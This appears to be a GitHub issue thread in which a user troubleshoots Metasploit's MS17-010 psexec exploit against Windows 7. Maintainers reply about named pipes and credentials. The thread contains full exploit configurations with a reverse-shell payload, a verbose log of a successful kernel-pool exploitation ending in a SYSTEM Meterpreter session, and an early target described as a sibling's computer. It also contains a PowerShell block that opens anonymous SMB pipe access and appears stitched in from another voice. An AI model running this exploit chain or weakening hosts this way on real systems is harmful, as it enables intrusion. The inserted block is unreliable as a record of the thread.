Closed elibr1212 closed 6 years ago
What named pipes did the exploit find?
Actually, paste all your output.
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE true yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.0.0.28 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser berkhim no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.14 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.14:4444
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
I use Kali. I did not set SMBPass; I set SMBUser. The Windows victim is Windows 7.
Is setting SMBUser causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION?
Also, does the exploit work without setting SMBUser?
STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.
Also, does the exploit work without setting SMBUser?
In Windows XP I tried without setting a username and password and it succeeded, but on Windows 7 it did not work for me, and I saw in another video that it did work. Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s That's why it's confusing.
What error does it give when you try it without setting SMBUser?
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
Have you checked if the target is vulnerable to ms17_010?
Detecting an accessible named pipe is, I think, the entry point; if the exploit doesn't find one, then I'm afraid it won't work at all.
Yes. It's my little brother's computer and I'm learning with it, so I opened port 445 from the beginning.
msf > clear
[*] exec: clear
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.0.0.28
rhosts => 10.0.0.28
msf auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) >
set VERBOSE true
and try again, @elibr1212.
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) >
What named pipes did the exploit find?
So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.
"You either need creds, anonymous access" - how do I do it?
If you control the box you're testing, you can use known creds or enable anonymous access via https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-named-pipes-that-can-be-accessed-anonymously.
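The two failures in this thread come from local security policy on the target, not from the MS17-010 check: with SMBUser set and SMBPass empty, the module performs a blank-password network logon, which the "Accounts: Limit local account use of blank passwords to console logon only" policy rejects with STATUS_ACCOUNT_RESTRICTION; with no credentials at all, the anonymous session can only open pipes listed under "Network access: Named Pipes that can be accessed anonymously", which is empty on a default Windows 7, hence the STATUS_ACCESS_DENIED loop. The PowerShell below is an added example, not code from this thread or from the Metasploit module. It audits those settings on a Windows 7 lab box you own and, for a lab only, adds pipe names to the anonymous list. The registry value names (LimitBlankPasswordUse, RestrictNullSessAccess, NullSessionPipes) are the documented backing values for those policies but are stated here as assumptions to verify in secpol.msc; the function names are mine.

```powershell
# Added example for this thread. Run in an elevated PowerShell (2.0 or later) on a
# Windows 7 lab box you control. Assumed policy-to-registry mappings:
#   "Accounts: Limit local account use of blank passwords to console logon only"
#       -> HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse (DWORD, 1 = enabled)
#   "Network access: Restrict anonymous access to Named Pipes and Shares"
#       -> HKLM\...\Services\LanmanServer\Parameters\RestrictNullSessAccess (DWORD, 1 = enabled)
#   "Network access: Named Pipes that can be accessed anonymously"
#       -> HKLM\...\Services\LanmanServer\Parameters\NullSessionPipes (REG_MULTI_SZ)

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$SrvKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-SmbAnonymousPosture {
    # Reads the settings that decide whether a blank-password or anonymous SMB
    # client can reach a named pipe. A missing value is treated as "enabled",
    # which is the Windows default for all three.
    $limitBlank = (Get-ItemProperty -Path $LsaKey -Name LimitBlankPasswordUse -ErrorAction SilentlyContinue).LimitBlankPasswordUse
    $restrict   = (Get-ItemProperty -Path $SrvKey -Name RestrictNullSessAccess -ErrorAction SilentlyContinue).RestrictNullSessAccess
    $pipes      = (Get-ItemProperty -Path $SrvKey -Name NullSessionPipes -ErrorAction SilentlyContinue).NullSessionPipes

    New-Object PSObject -Property @{
        # 1 => a local account with an empty password cannot log on over the network,
        #      so "set SMBUser x" with no SMBPass yields STATUS_ACCOUNT_RESTRICTION.
        LimitBlankPasswordUse  = $(if ($null -eq $limitBlank) { 1 } else { $limitBlank })
        # 1 => anonymous (null) sessions only reach pipes named in NullSessionPipes.
        RestrictNullSessAccess = $(if ($null -eq $restrict) { 1 } else { $restrict })
        # Pipes an anonymous session may open; empty on a default Windows 7 install,
        # which is why the module's auto pipe search reports every pipe as inaccessible.
        NullSessionPipes       = @($pipes | Where-Object { $_ -ne '' })
    }
}

function Add-LabNullSessionPipe {
    # Lab-only weakening: allow anonymous access to the given pipes so that the
    # ms17_010_psexec auto pipe search can find one. lsarpc and samr are served by
    # lsass on Windows 7 and are among the names the module tries (see the log above).
    param([string[]]$PipeName = @('lsarpc', 'samr'))

    $current = @((Get-ItemProperty -Path $SrvKey -Name NullSessionPipes -ErrorAction SilentlyContinue).NullSessionPipes |
                 Where-Object { $_ -ne '' })
    $merged  = @($current + $PipeName | Select-Object -Unique)

    # Write the REG_MULTI_SZ; -Force overwrites an existing value.
    New-ItemProperty -Path $SrvKey -Name NullSessionPipes -PropertyType MultiString -Value $merged -Force | Out-Null
    # The Server service reads NullSessionPipes at start, so restart it.
    Restart-Service -Name LanmanServer -Force
    return $merged
}

function Remove-LabNullSessionPipe {
    # Undo the weakening once you are done testing.
    Remove-ItemProperty -Path $SrvKey -Name NullSessionPipes -ErrorAction SilentlyContinue
    Restart-Service -Name LanmanServer -Force
}

Get-SmbAnonymousPosture | Format-List
```

Typical use: run Get-SmbAnonymousPosture first; on a stock Windows 7 it reports both DWORDs as 1 and an empty pipe list, which matches the "Inaccessible named pipe ... STATUS_ACCESS_DENIED" output in this thread. Then either call Add-LabNullSessionPipe and re-run the module with SMBUser unset (unset SMBUser in msfconsole), or leave the policy alone and give the module a real SMBUser and SMBPass for an account permitted to log on over the network. Note that NullSessionPipes only matters while RestrictNullSessAccess is 1; setting it to 0 opens every pipe to anonymous sessions, which is a much larger change than listing two pipes. Revert with Remove-LabNullSessionPipe when finished.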
@wvu-r7 do we need to add named pipes like COMNAP, COMNODE described in the above article to the list?
"If you control the box you're testing" - yes. Now I checked the computer, and I see that the sharing service is not working, and when I try to run it in "services" it does not let me turn on the render.. And I'll look at what you sent. Well done for the work you do! It's not taken for granted. You are champions.
Probably not if they're for IBM mainframes. :P
I opened a virtual machine (Windows 7 x86) now, lol, and it worked:
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] 10.0.0.21:445 - Connected to named pipe: epmapper
[*] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8
[*] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020
[*] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8
[*] 10.0.0.21:445 - Attempting leak #0
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x97353028
[*] 10.0.0.21:445 - InParam: 0x9e2c20dc
[*] 10.0.0.21:445 - MID: 0xb03
[-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8
[*] 10.0.0.21:445 - Align transaction and leak failed, attempt #0
[*] 10.0.0.21:445 - Attempting leak #1
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x9e2d4050
[*] 10.0.0.21:445 - InParam: 0x9e2ce0dc
[*] 10.0.0.21:445 - MID: 0xb03
[*] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion
[*] 10.0.0.21:445 - Control of groom transaction
[*] 10.0.0.21:445 - Built a write-what-where primitive...
[*] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee
[*] 10.0.0.21:445 - Session Data: [elided]
[*] 10.0.0.21:445 - session dat len = 256
[*] 10.0.0.21:445 - Session ctx offset = 80
[*] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00
[*] 10.0.0.21:445 - secCtxAddr: 9e2837d8
[*] 10.0.0.21:445 - Reading secCtxData from 9e2837d8
[*] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000
[*] 10.0.0.21:445 - Overwrote token SID security context with fake context
[+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.0.0.21:445 - PowerShell found
[*] 10.0.0.21:445 - Selecting PowerShell target
[*] 10.0.0.21:445 - Powershell command length: 2404
[*] 10.0.0.21:445 - Executing the payload...
[*] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Obtaining a service manager handle...
[*] 10.0.0.21:445 - Creating the service...
[+] 10.0.0.21:445 - Successfully created the service
[*] 10.0.0.21:445 - Starting the service...
[+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.0.0.21:445 - Removing the service...
[+] 10.0.0.21:445 - Successfully removed the service
[*] 10.0.0.21:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 10.0.0.21
[+] 10.0.0.21:445 - SYSTEM session cleaned up.
[*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300
meterpreter > sysinfo
Computer        : WIN-IUAS33RLC03
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : he_IL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
Did you read the module doc? info -d may have been helpful.
I did it through anonymous access as you said.. And yes, thanks.
Why am I only there and the user is showing me this? I understood that it was possible without a password.. How can I read even an article on the script, on how to use it?